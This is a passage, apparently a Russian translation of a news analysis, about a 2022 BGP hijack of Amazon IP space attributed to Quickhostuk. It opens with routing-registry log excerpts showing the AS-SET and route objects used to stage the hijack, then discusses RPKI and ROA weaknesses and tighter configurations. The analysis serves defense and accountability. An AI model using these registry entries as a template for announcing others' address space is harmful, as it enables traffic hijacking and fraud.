    irrd.log-20220817.gz:31106280-
    irrd.log-20220817.gz:31106281-as-set: AS-SET209243
    irrd.log-20220817.gz:31106306-descr: quickhost set
    irrd.log-20220817.gz:31106332-members: AS209243, AS16509
    irrd.log-20220817.gz:31106362:mnt-by: MAINT-QUICKHOSTUK
    irrd.log-20220817.gz:31106392-changed: crussell()quickhostuk net 20220816
    irrd.log-20220817.gz:31106438-source: ALTDB

    irrd.log-20220817.gz:31147549-ADD 96127
    irrd.log-20220817.gz:31147559-
    irrd.log-20220817.gz:31147560-route: 44.235.216.0/24
    irrd.log-20220817.gz:31147588-descr: route
    irrd.log-20220817.gz:31147606-origin: AS16509
    irrd.log-20220817.gz:31147626:mnt-by: MAINT-QUICKHOSTUK
    irrd.log-20220817.gz:31147656-changed: crussell()quickhostuk net 20220816
    irrd.log-20220817.gz:31147702-source: ALTDB

    AS-SET — это регистрационная запись, определяющая допустимый набор номеров ASN, с которыми провайдер может взаимодействовать в глобальной сети.
    Анализируя, почему этот приём не смог предотвратить угон bgp-сессии в прошлом месяце, Мадори осторожно отметил, что RPKI предназначен для ограничения воздействия непреднамеренных или случайных перехватов bgp из-за утечек маршрутизации или неправильных конфигураций, а не в качестве механизма безопасности для предотвращения мошенничества и угона bgp-сессии со стороны мотивированных нарушителей.
    Он написал: «Тем не менее, это все равно могло бы помочь, если бы ROA было настроено по-другому. В нынешнем виде ROA для рассматриваемого адресного пространства довольно либерален. По сути, три разных ASN Amazon (16509, 8987 и 14618) могут объявлять части этого адресного пространства с префиксами размером от /10 до /24. Посмотрите выходные данные веб-интерфейса Routinator:…»

    Альтернативным подходом к созданию ROA было бы сделать то, что сделали другие сети, такие как Cloudflare и Comcast: установить источник и максимальную длину префикса, чтобы они были идентичны тому, как маршрутизируется префикс. Хотя этот подход влечет за собой накладные расходы, связанные с необходимостью обновлять ROA каждый раз при изменении маршрута, он также оставляет мало места для ввода в обращение альтернативных версий маршрута.
    Честно говоря, Amazon — далеко не единственный облачный оператор, потерявший контроль над своими IP-адресами в результате атаки BGP. Уязвимость BGP к неуклюжим ошибкам в настройке и откровенному мошенничеству очевидна уже более двух десятилетий. Отсутствие безопасности в конечном итоге является общеотраслевой проблемой, которую Amazon не в состоянии решить в одиночку.
    Но как облачный провайдер первого уровня, который в настоящее время пострадал как минимум от двух перехватов BGP, которые стоили денег нижестоящим пользователям, Amazon следует ожидать, что он признает это событие, объяснит, почему он ждал более трех часов, чтобы принять корректирующие меры, и наметит план. для предотвращения подобных случаев в будущем. Вместо того, чтобы хранить молчание по радио, как это делалось в течение последних пяти недель, Quickhostuk также должен объяснить этот инцидент и объяснить, почему его ASN опубликовал такое проблемное объявление.